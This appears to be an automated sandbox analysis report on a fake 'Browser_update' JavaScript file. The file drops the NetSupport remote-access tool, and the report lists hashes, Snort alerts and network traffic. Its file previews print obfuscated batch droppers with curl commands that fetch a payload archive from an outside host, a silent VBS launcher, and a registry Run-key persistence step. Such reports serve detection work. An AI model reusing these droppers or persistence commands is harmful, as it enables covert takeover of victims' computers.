                                                        Preview:7z..'...b...;3#.....%........}.4....N]...........&...@...ZtA.4..x=i...h.5.UBh.K....KB}"GA..........x.....6.c.8..V.>..3.3.~...b..X......W.b...w....ubQ...h[....`..3)....>......U..K..Y.0}(.g..7..brw..y..../3z.t...,.g.@...aJ......0K........'Q......s.2!.@..7.g..~....a..........V.N3....../Mr$.yL.N...CKu8."N.i......#w..Oc...!..6.c..0......%.?.0..:...d....F..n..!....zz..v.9W..UB.n0........w..P...JD......L&..^G.o..(D..`y..e.N.B/..l...&..L..,.$..3.l.<G....C.a5...S.70g}...s........;.....#.#BlO.....h.5....u...y......NUU...B..S.m.......Q..E.D...6.. K.r.E....A.8..J;...5..q..(......V#...'......)....,.M.I..s...*#j..s.%.Z$....n<.......a...53u.,....^o....7j...;.2....1.N)p..>........L....qK\..$....@U.....I.F@.E+*.....~......aI^...w....V.t..o...2U,".d.4.......}..<.L.U.....z..a..7u.U1..ua`.....T.7....a.$.....N;..t.Fa7...?..s9.....ICU...;.w..F.w.[A@x.....U.k.$..!D.......C$h.I.._.h*...q...T...mN|....?/.......us.>..M..+..h......yBF.-...S...?b.f)......L..8......{f

                                                        C:\ProgramData\msvcr100.dll

                                                        Download File
                                                        Process:C:\ProgramData\7zz.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):773968
                                                        Entropy (8bit):6.901559811406837
                                                        Encrypted:false
                                                        SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                        MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                        SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                        SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                        SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Reputation:unknown
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\ProgramData\nskbfltr.inf

                                                        Download File
                                                        Process:C:\ProgramData\7zz.exe
                                                        File Type:Windows setup INFormation
                                                        Category:dropped
                                                        Size (bytes):328
                                                        Entropy (8bit):4.93007757242403
                                                        Encrypted:false
                                                        SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                        MD5:26E28C01461F7E65C402BDF09923D435
                                                        SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                        SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                        SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......

                                                        C:\ProgramData\nsm_vpro.ini

                                                        Download File
                                                        Process:C:\ProgramData\7zz.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):46
                                                        Entropy (8bit):4.532048032699691
                                                        Encrypted:false
                                                        SSDEEP:3:lsylULyJGI6csM:+ocyJGIPsM
                                                        MD5:3BE27483FDCDBF9EBAE93234785235E3
                                                        SHA1:360B61FE19CDC1AFB2B34D8C25D8B88A4C843A82
                                                        SHA-256:4BFA4C00414660BA44BDDDE5216A7F28AECCAA9E2D42DF4BBFF66DB57C60522B
                                                        SHA-512:EDBE8CF1CBC5FED80FEDF963ADE44E08052B19C064E8BCA66FA0FE1B332141FBE175B8B727F8F56978D1584BAAF27D331947C0B3593AAFF5632756199DC470E5
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:[COMMON]..Storage_Enabled=0..Debug_Level=0....

                                                        C:\ProgramData\pcicapi.dll

                                                        Download File
                                                        Process:C:\ProgramData\7zz.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33144
                                                        Entropy (8bit):6.7376663312239256
                                                        Encrypted:false
                                                        SSDEEP:768:JFvNhAyi5hHA448qZkSn+EgT8ToDXTVi0:JCyoHA448qSSzgIQb
                                                        MD5:34DFB87E4200D852D1FB45DC48F93CFC
                                                        SHA1:35B4E73FB7C8D4C3FEFB90B7E7DC19F3E653C641
                                                        SHA-256:2D6C6200508C0797E6542B195C999F3485C4EF76551AA3C65016587788BA1703
                                                        SHA-512:F5BB4E700322CBAA5069244812A9B6CE6899CE15B4FD6384A3E8BE421E409E4526B2F67FE210394CD47C4685861FAF760EFF9AF77209100B82B2E0655581C9B2
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\pcicapi.dll, Author: Joe Security
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                        Reputation:unknown
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................

                                                        C:\ProgramData\putty.exe

                                                        Download File
                                                        Process:C:\ProgramData\7zz.exe
                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):1647912
                                                        Entropy (8bit):6.92723334837222
                                                        Encrypted:false
                                                        SSDEEP:49152:TDXOPFJK9bbYF8paMB8QMy3bHwPXNg/7UyW+ekBeZmn:T0WhreNg/X
                                                        MD5:F838FDAFD0881CF1E6040A07D78E840D
                                                        SHA1:2A35456B2F67BD12905378BEB6EAF373F6A0D0D1
                                                        SHA-256:FC6F9DBDF4B9F8DD1F5F3A74CB6E55119D3FE2C9DB52436E10BA07842E6C3D7C
                                                        SHA-512:5C0389EB79E5C2638C0D770CDE1A5C56A237AA596503966D4F226A99F94531AF501F8BF4EFA00722E12998F73271E50D8C187F8E984125AFFE40B1AB231503B4
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Reputation:unknown
                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....\c.........."......Z...p.................@.............................`......D.....`.............................................................X.......xl......(W...@..................................(......@...........(................................text...fY.......Z.................. ..`.rdata.......p.......^..............@..@.data....U...p.......^..............@....pdata..xl.......n...n..............@..@.00cfg..8....@......................@..@.gxfg...`*...P...,..................@..@.tls................................@..._RDATA..\...........................@..@.rsrc...X...........................@..@.reloc.......@... ..................@..B........................................................................................................................................................................................................................

                                                        C:\ProgramData\qweq.bat

                                                        Download File
                                                        Process:C:\Windows\System32\cmd.exe
                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                        Category:modified
                                                        Size (bytes):532
                                                        Entropy (8bit):5.259398326283338
                                                        Encrypted:false
                                                        SSDEEP:12:kh5ObfauP28nlxWZ3lMVj0ESLXRtf4LXnidEWSDcEA:B62AlMVJuXRtf8XnIED2
                                                        MD5:975B043ED876F1C265AACB60BBEA6B11
                                                        SHA1:3B8F7AE6B0282BE88D08B171BF9267FDF4CBF28E
                                                        SHA-256:F344211B6F67F0AE3D6256648526C6E986EC8E4F31367FA17AB963DE788BD6D8
                                                        SHA-512:E9D2E306B9A562E94B8793C87B7C4506274D67561D715871DFF1E88038C7413F32307602F5DDC97363A62875B16BBBD307D01DA897C88C6EB33F004A6FAE4877
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:@echo off....:: ssRsgs3sgsbgsggsgs3gsgs3s3Z6..:: ssRbZgs6gsgs326fssRb....start /b /min xcopy /h /y 7zz.exe C:\ProgramData\ && start /b /min cmd /c C:\ProgramData\7zz.exe x -y C:\ProgramData\lolo.7z -oC:\ProgramData\ && TIMEOUT /T 7 && start /b /min cmd /c C:\ProgramData\client32.exe....set CachedX=HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run..reg query "%CachedX%" >nul 2>&1.. if %errorlevel% equ 0 (.. reg add "%CachedX%" /v "CachedX" /t REG_SZ /d "C:\ProgramData\client32.exe" /f .. ).. ::fhgggsgs3sgs3sgssgs3sgssgs

                                                        C:\ProgramData\remcmdstub.exe

                                                        Download File
                                                        Process:C:\ProgramData\7zz.exe
                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):63864
                                                        Entropy (8bit):6.446503462786185
                                                        Encrypted:false
                                                        SSDEEP:1536:Tf6fvDuNcAjJMBUHYBlXU1wT2JFqy9BQhiK:D6f7cjJ4U4I1jFqy92hiK
                                                        MD5:6FCA49B85AA38EE016E39E14B9F9D6D9
                                                        SHA1:B0D689C70E91D5600CCC2A4E533FF89BF4CA388B
                                                        SHA-256:FEDD609A16C717DB9BEA3072BED41E79B564C4BC97F959208BFA52FB3C9FA814
                                                        SHA-512:F9C90029FF3DEA84DF853DB63DACE97D1C835A8CF7B6A6227A5B6DB4ABE25E9912DFED6967A88A128D11AB584663E099BF80C50DD879242432312961C0CFE622
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                        Reputation:unknown
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$U..`4..`4..`4..{.D.q4..{.p.54..iLI.e4..`4..74..{.q.}4..{.@.a4..{.G.a4..Rich`4..................PE..L......U.....................J.......!............@.......................... .......o....@....................................<.......T...............x)..............................................@...............@............................text............................... ..`.rdata...%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B........................................................................................................................................................................................................................................................................................................................................

                                                        C:\ProgramData\sett.bat

                                                        Download File
                                                        Process:C:\Windows\System32\cmd.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):253
                                                        Entropy (8bit):5.252065837709503
                                                        Encrypted:false
                                                        SSDEEP:6:CxBR2N723f9QSkCfFlCe8UlLAHbKx48HKmnOB1N723fQRnn:cn2aONCfFADC0vTmnOFacnn
                                                        MD5:147DDB0487A37D940F81A53B0675B2AC
                                                        SHA1:37803155B72CD06F867A2D4140D6A1EB32D09F59
                                                        SHA-256:CC418B8C0C45307E08E4ADCC0C470C7115471B2551CBE71FC8EDB01FDA1EF393
                                                        SHA-512:907AF162ECEA2018372F9990835C6653DD79E11524FA268CC479C83FA7C142CE2754ABA4E4DF6A54096AF8B6D59F89584CA8FF52B078D64650F0E325ACA65976
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:if not exist "C:\Users\user\AppData\Local\Temp/lolo.7z" ( curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z" -o "C:\ProgramData\lolo.7z" ) .."C:\Users\user\AppData\Local\Temp/sett.bat"..

                                                        C:\ProgramData\wtgfOhpYJsY.bat

                                                        Download File
                                                        Process:C:\Windows\System32\wscript.exe
                                                        File Type:DOS batch file, ASCII text
                                                        Category:dropped
                                                        Size (bytes):1908
                                                        Entropy (8bit):5.243181486469752
                                                        Encrypted:false
                                                        SSDEEP:24:VzNEa7DDmcKEK88leevTwKev5NaczevNDB4HK:Vz/7DPKEK8852Xt6NQK
                                                        MD5:CC74CF81F442E922B077F6CF0F87FA41
                                                        SHA1:D8BE8FCB85507D5B05A3025BB0CEFBD0B614DE96
                                                        SHA-256:6A58399A333E0B20E9FE1944EE997585A7A1927776308048DA1E3FB7734EF581
                                                        SHA-512:1F00A8B92F83B3E84D4798AB2805432CD3A1061CB294DFA4C869D9BAA0DF233A9BD68788DFC68BBAB9995305E7634937AA35AD3F75DC40095CF1BD0A53BF655C
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:@echo off..:: R11ffsRsfsRb.:: 3Z6fKfsRKfsRb..set "fdaa=set ".%fdaa%"fdgxvxcvxc=C:\Prog".%fdaa%"hghgdgdfsz=ramD".%fdaa%"hyturdfgf=ata\"..:: R11KfsffsRssRsRsRRb.:: ssRsRfsRsRRb..%fdgxvxcvxc%%hghgdgdfsz%%hyturdfgf%..set "fgdgh=set ".%fgdgh%"vbnvbv=Wscr".%fgdgh%"jhgcvbc=ipt.Sh".%fgdgh%"jhvbcs=ell"..:: RsfsRR11Rb.%vbnvbv%%jhgcvbc%%jhvbcs%..set "ghjgr=set ".%ghjgr%"cvbcvbsds=WSc".%ghjgr%"gfgxxc=rit.Ar".%ghjgr%"hgvbcvbc=guments"..:: R11fsRssRRRb..%cvbcvbsds%%gfgxxc%%hgvbcvbc%..:: 1sRs1sRs1sRs1sRs..echo CreateObject^(%vbnvbv%%jhgcvbc%%jhvbcs%^).Run ^& %cvbcvbsds%%gfgxxc%%hgvbcvbc%^(0^) ^& , 0, False > "%tmp%/b1.vbs".(echo if not exist "%tmp%/lolo.7z" ^( curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z" -o "%fdgxvxcvxc%%hghgdgdfsz%%hyturdfgf%lolo.7z" ^) & echo "%tmp%/sett.bat") > "%fdgxvxcvxc%%hghgdgdfsz%%hyturdfgf%sett.bat"..echo CreateObject^(%vbnvbv%%jhgcvbc%%jhvbcs%^).Run ^& %cvbcvbsds%%gfgxxc%%hgvbcvbc%^(0^) ^& , 0, False > "%tm

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\11[1].bat

                                                        Download File
                                                        Process:C:\Windows\System32\wscript.exe
                                                        File Type:DOS batch file, ASCII text
                                                        Category:dropped
                                                        Size (bytes):1908
                                                        Entropy (8bit):5.243181486469752
                                                        Encrypted:false
                                                        SSDEEP:24:VzNEa7DDmcKEK88leevTwKev5NaczevNDB4HK:Vz/7DPKEK8852Xt6NQK
                                                        MD5:CC74CF81F442E922B077F6CF0F87FA41
                                                        SHA1:D8BE8FCB85507D5B05A3025BB0CEFBD0B614DE96
                                                        SHA-256:6A58399A333E0B20E9FE1944EE997585A7A1927776308048DA1E3FB7734EF581
                                                        SHA-512:1F00A8B92F83B3E84D4798AB2805432CD3A1061CB294DFA4C869D9BAA0DF233A9BD68788DFC68BBAB9995305E7634937AA35AD3F75DC40095CF1BD0A53BF655C
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:@echo off..:: R11ffsRsfsRb.:: 3Z6fKfsRKfsRb..set "fdaa=set ".%fdaa%"fdgxvxcvxc=C:\Prog".%fdaa%"hghgdgdfsz=ramD".%fdaa%"hyturdfgf=ata\"..:: R11KfsffsRssRsRsRRb.:: ssRsRfsRsRRb..%fdgxvxcvxc%%hghgdgdfsz%%hyturdfgf%..set "fgdgh=set ".%fgdgh%"vbnvbv=Wscr".%fgdgh%"jhgcvbc=ipt.Sh".%fgdgh%"jhvbcs=ell"..:: RsfsRR11Rb.%vbnvbv%%jhgcvbc%%jhvbcs%..set "ghjgr=set ".%ghjgr%"cvbcvbsds=WSc".%ghjgr%"gfgxxc=rit.Ar".%ghjgr%"hgvbcvbc=guments"..:: R11fsRssRRRb..%cvbcvbsds%%gfgxxc%%hgvbcvbc%..:: 1sRs1sRs1sRs1sRs..echo CreateObject^(%vbnvbv%%jhgcvbc%%jhvbcs%^).Run ^& %cvbcvbsds%%gfgxxc%%hgvbcvbc%^(0^) ^& , 0, False > "%tmp%/b1.vbs".(echo if not exist "%tmp%/lolo.7z" ^( curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z" -o "%fdgxvxcvxc%%hghgdgdfsz%%hyturdfgf%lolo.7z" ^) & echo "%tmp%/sett.bat") > "%fdgxvxcvxc%%hghgdgdfsz%%hyturdfgf%sett.bat"..echo CreateObject^(%vbnvbv%%jhgcvbc%%jhvbcs%^).Run ^& %cvbcvbsds%%gfgxxc%%hgvbcvbc%^(0^) ^& , 0, False > "%tm

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\loca[1].htm

                                                        Download File
                                                        Process:C:\ProgramData\client32.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):15
                                                        Entropy (8bit):2.8402239289418514
                                                        Encrypted:false
                                                        SSDEEP:3:yAcn:yV
                                                        MD5:020DF0663B4F5741AD652976C4207B0B
                                                        SHA1:50AAA69D3EA68A7B16AA8FCBD866A6598EC39392
                                                        SHA-256:0B4688799BA0DF92A3730B63635CC57F19DF94357AE63850AB96771A5711A3E1
                                                        SHA-512:A6CA0A74AC46AB3A42B61A534BD97D167DF6900627E9076D75C40744D9B87EF71C26C9D8C797D5B410BFEF8A7805B87DE81CCC9BB76743B69678C083E3B07AE9
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:47.1772,8.42719

                                                        C:\Users\user\AppData\Local\Temp\b1.vbs

                                                        Download File
                                                        Process:C:\Windows\System32\cmd.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):70
                                                        Entropy (8bit):4.6987263671247135
                                                        Encrypted:false
                                                        SSDEEP:3:FER/McVqQDDIgk7O+JF9Bv:FEREkqOMgkq+Lzv
                                                        MD5:A883AA8226B7A6328633EB161B7EFB85
                                                        SHA1:9493C6A36F9155D2C210E98582B7DEDC2E92987A
                                                        SHA-256:EE218F8B91B270886DC87064F014AC734E0E80EC87214DCF149B436CCFA8B9DA
                                                        SHA-512:A88DE3B82705C7170B21A12A76EA27A07D31F0C9A85A8F02FCAB2C5E42669F62A9B157E52DDA9CC497BCB93E3D11FCD5D47553B44BB4C018CE642E7A9694E678
                                                        Malicious:true
                                                        Reputation:unknown
                                                        Preview:CreateObject(Wscript.Shell).Run & WScrit.Arguments(0) & , 0, False ..

                                                        C:\Users\user\AppData\Local\Temp\b2.vbs

                                                        Download File
                                                        Process:C:\Windows\System32\cmd.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):70
                                                        Entropy (8bit):4.6987263671247135
                                                        Encrypted:false
                                                        SSDEEP:3:FER/McVqQDDIgk7O+JF9Bv:FEREkqOMgkq+Lzv
                                                        MD5:A883AA8226B7A6328633EB161B7EFB85
                                                        SHA1:9493C6A36F9155D2C210E98582B7DEDC2E92987A
                                                        SHA-256:EE218F8B91B270886DC87064F014AC734E0E80EC87214DCF149B436CCFA8B9DA
                                                        SHA-512:A88DE3B82705C7170B21A12A76EA27A07D31F0C9A85A8F02FCAB2C5E42669F62A9B157E52DDA9CC497BCB93E3D11FCD5D47553B44BB4C018CE642E7A9694E678
                                                        Malicious:true
                                                        Reputation:unknown
                                                        Preview:CreateObject(Wscript.Shell).Run & WScrit.Arguments(0) & , 0, False ..

                                                        C:\Users\user\AppData\Local\Temp\b3.vbs

                                                        Download File
                                                        Process:C:\Windows\System32\cmd.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):70
                                                        Entropy (8bit):4.6987263671247135
                                                        Encrypted:false
                                                        SSDEEP:3:FER/McVqQDDIgk7O+JF9Bv:FEREkqOMgkq+Lzv
                                                        MD5:A883AA8226B7A6328633EB161B7EFB85
                                                        SHA1:9493C6A36F9155D2C210E98582B7DEDC2E92987A
                                                        SHA-256:EE218F8B91B270886DC87064F014AC734E0E80EC87214DCF149B436CCFA8B9DA
                                                        SHA-512:A88DE3B82705C7170B21A12A76EA27A07D31F0C9A85A8F02FCAB2C5E42669F62A9B157E52DDA9CC497BCB93E3D11FCD5D47553B44BB4C018CE642E7A9694E678
                                                        Malicious:true
                                                        Reputation:unknown
                                                        Preview:CreateObject(Wscript.Shell).Run & WScrit.Arguments(0) & , 0, False ..

                                                        \Device\ConDrv

                                                        Download File
                                                        Process:C:\ProgramData\7zz.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):817
                                                        Entropy (8bit):5.0668216874897265
                                                        Encrypted:false
                                                        SSDEEP:12:p5gXLDM+zWZiTknz4oG4qixLKjoKLkVKWPpx6osPChYT1kmLB806GLYIQKI9DlHM:p5gXZWZiTOzr2jtgJ6lPHHNIbHM
                                                        MD5:52CE7FD84FE8DA2C5774CB7681DA4A75
                                                        SHA1:E339AF48FD51F99CA41BEE55445AC756CA1FF3BE
                                                        SHA-256:A61C29FF09042B0C2021B3F66BD905109AF04C27EBEDB6AF568A79ECF96784BB
                                                        SHA-512:1DD001AA6B82715DEE7ABA7B5D5C8B8DBE39E88A66B760947B86A78056A66DB539D2DAEDB5792872953E06C6B94839B20B80C5F87CACC6866DFB393FC5E4FA73
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:..7-Zip (A) 9.20 Copyright (c) 1999-2010 Igor Pavlov 2010-11-18....Processing archive: C:\ProgramData\lolo.7z....Extracting PScripts..Extracting CacheDate.dat..Extracting CacheMD5.dat..Extracting NSM.ini..Extracting nsm_vpro.ini..Extracting nskbfltr.inf..Extracting NSM.LIC..Extracting desktop.ini..Extracting client32.ini..Extracting PScripts\insert_delimiter.pscript..Extracting PScripts\rot-13.pscript..Extracting CacheURL.dat..Extracting HTML_Obj_list.txt..Extracting Settings.txt..Extracting client32.exe..Extracting remcmdstub.exe..Extracting HTCTL32.DLL..Extracting msvcr100.dll..Extracting pcicapi.dll..Extracting PCICHEK.DLL..Extracting PCICL32.DLL..Extracting TCCTL32.DLL..Extracting putty.exe....Everything is Ok....Folders: 1..Files: 22..Size: 7115655..Compressed: 2306944..

                                                        \Device\Null

                                                        Download File
                                                        Process:C:\Windows\System32\reg.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):123
                                                        Entropy (8bit):5.145369538607512
                                                        Encrypted:false
                                                        SSDEEP:3:+v8Nwqp2YqrZfyM1K7eDfFFFFqu//3d+RICkREvLAd0:rNgZH1jzLd+iW40
                                                        MD5:0587DF28B683C9AE9BF19D2A34DC1CE0
                                                        SHA1:D46563275A3123A5DDED28F4DDB609F1B04C8A20
                                                        SHA-256:46B93A34BB7E073C9C65F891D0A7D1782881E50F411385416A5ED3866948EC20
                                                        SHA-512:DE577BAEAF2176B24CA10F2A71AFF6C0376D99955A1CADB0B2ECEF204EA5B38359C4F4B754EA6738941A85DF8EA8E1B18EE0301FE61D96DAF7830C3E9BEFD1F5
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:..HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.. CachedX REG_SZ C:\ProgramData\client32.exe....

                                                        Static File Info

                                                        General

                                                        File type:ASCII text, with CRLF, LF line terminators
                                                        Entropy (8bit):5.406050034443632
                                                        TrID:
                                                          File name:Browser_update16.0.5836.js
                                                          File size:499 bytes
                                                          MD5:8fb80e0a6f0c305371b8dc11db0c1552
                                                          SHA1:6a526ca78d175b5ec46fd4dd5fdc3f0591cb4eb7
                                                          SHA256:734666652f013df6bb435fe22fdd811274efb8e09e3fef9a2495396319d1d1e5
                                                          SHA512:aa6943dfd13e0690459708fc321960291c8f5bd15147e8bd09d0addb12f8c7764b169cf4dd3211ab13fd3ba38a5399d907b9a852eef31b20573198c6ca1052f6
                                                          SSDEEP:6:2LGXpLytGAv2FFOMv+AUVsSKh/m4Ek1X/eSOjKhQ1C02Yyz9H0+usBPzjLx1ATg0:2QlGGAaF9EkdGVw09yRH1cTE6Xqmu2n
                                                          TLSH:58F0C00D75927460020365E1A267082BF45AE615C70E5488E154DBAC1C2080C877ADEB
                                                          File Content Preview:(function(){....// Extended JavaScript BN functions, required for RSA private ops.....// Version 1.1: new BigInteger('0', 10) returns 'proper' zero..// Version 1.2: square() API, isProbablePrime fix....// (public)......});./*20230801 - 18533*/var e;e=func

                                                          File Icon

                                                          Icon Hash:68d69b8bb6aa9a86

                                                          Network Behavior

                                                          Snort IDS Alerts

                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                          192.168.2.68.8.8.849448532854911 08/02/23-10:16:17.568207UDP2854911ETPRO TROJAN Fake Browser Update Domain in DNS Lookup4944853192.168.2.68.8.8.8
                                                          192.168.2.6185.9.147.166497054432854914 08/02/23-10:16:17.742725TCP2854914ETPRO TROJAN Fake Browser Update Domain in TLS SNI49705443192.168.2.6185.9.147.166
                                                          192.168.2.694.158.247.234971050502827745 08/02/23-10:19:37.575836TCP2827745ETPRO TROJAN NetSupport RAT CnC Activity497105050192.168.2.694.158.247.23

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Aug 2, 2023 10:16:17.727232933 CEST49705443192.168.2.6185.9.147.166
                                                          Aug 2, 2023 10:16:17.727305889 CEST44349705185.9.147.166192.168.2.6
                                                          Aug 2, 2023 10:16:17.727422953 CEST49705443192.168.2.6185.9.147.166
                                                          Aug 2, 2023 10:16:17.742724895 CEST49705443192.168.2.6185.9.147.166
                                                          Aug 2, 2023 10:16:17.742810011 CEST44349705185.9.147.166192.168.2.6
                                                          Aug 2, 2023 10:16:17.884154081 CEST44349705185.9.147.166192.168.2.6
                                                          Aug 2, 2023 10:16:17.884341955 CEST49705443192.168.2.6185.9.147.166
                                                          Aug 2, 2023 10:16:17.892335892 CEST49705443192.168.2.6185.9.147.166
                                                          Aug 2, 2023 10:16:17.892394066 CEST44349705185.9.147.166192.168.2.6
                                                          Aug 2, 2023 10:16:17.893105030 CEST44349705185.9.147.166192.168.2.6
                                                          Aug 2, 2023 10:16:17.932691097 CEST49705443192.168.2.6185.9.147.166
                                                          Aug 2, 2023 10:16:18.207911015 CEST49705443192.168.2.6185.9.147.166
                                                          Aug 2, 2023 10:16:18.250809908 CEST44349705185.9.147.166192.168.2.6
                                                          Aug 2, 2023 10:16:18.345810890 CEST44349705185.9.147.166192.168.2.6
                                                          Aug 2, 2023 10:16:18.345844984 CEST44349705185.9.147.166192.168.2.6
                                                          Aug 2, 2023 10:16:18.345854998 CEST44349705185.9.147.166192.168.2.6
                                                          Aug 2, 2023 10:16:18.345870972 CEST44349705185.9.147.166192.168.2.6
                                                          Aug 2, 2023 10:16:18.345900059 CEST44349705185.9.147.166192.168.2.6
                                                          Aug 2, 2023 10:16:18.345930099 CEST49705443192.168.2.6185.9.147.166
                                                          Aug 2, 2023 10:16:18.345946074 CEST49705443192.168.2.6185.9.147.166
                                                          Aug 2, 2023 10:16:18.345952988 CEST44349705185.9.147.166192.168.2.6
                                                          Aug 2, 2023 10:16:18.345962048 CEST44349705185.9.147.166192.168.2.6
                                                          Aug 2, 2023 10:16:18.346039057 CEST49705443192.168.2.6185.9.147.166
                                                          Aug 2, 2023 10:16:18.404465914 CEST44349705185.9.147.166192.168.2.6
                                                          Aug 2, 2023 10:16:18.404496908 CEST44349705185.9.147.166192.168.2.6
                                                          Aug 2, 2023 10:16:18.404581070 CEST44349705185.9.147.166192.168.2.6
                                                          Aug 2, 2023 10:16:18.404623032 CEST44349705185.9.147.166192.168.2.6
                                                          Aug 2, 2023 10:16:18.404649973 CEST49705443192.168.2.6185.9.147.166
                                                          Aug 2, 2023 10:16:18.404666901 CEST44349705185.9.147.166192.168.2.6
                                                          Aug 2, 2023 10:16:18.404680967 CEST44349705185.9.147.166192.168.2.6
                                                          Aug 2, 2023 10:16:18.404696941 CEST44349705185.9.147.166192.168.2.6
                                                          Aug 2, 2023 10:16:18.404712915 CEST49705443192.168.2.6185.9.147.166
                                                          Aug 2, 2023 10:16:18.404768944 CEST49705443192.168.2.6185.9.147.166
                                                          Aug 2, 2023 10:16:18.404784918 CEST44349705185.9.147.166192.168.2.6
                                                          Aug 2, 2023 10:16:18.448307037 CEST49705443192.168.2.6185.9.147.166
                                                          Aug 2, 2023 10:16:18.464756966 CEST44349705185.9.147.166192.168.2.6
                                                          Aug 2, 2023 10:16:18.464801073 CEST44349705185.9.147.166192.168.2.6
                                                          Aug 2, 2023 10:16:18.464960098 CEST49705443192.168.2.6185.9.147.166
                                                          Aug 2, 2023 10:16:18.465003967 CEST44349705185.9.147.166192.168.2.6
                                                          Aug 2, 2023 10:16:18.465029001 CEST44349705185.9.147.166192.168.2.6
                                                          Aug 2, 2023 10:16:18.465063095 CEST44349705185.9.147.166192.168.2.6
                                                          Aug 2, 2023 10:16:18.465069056 CEST49705443192.168.2.6185.9.147.166
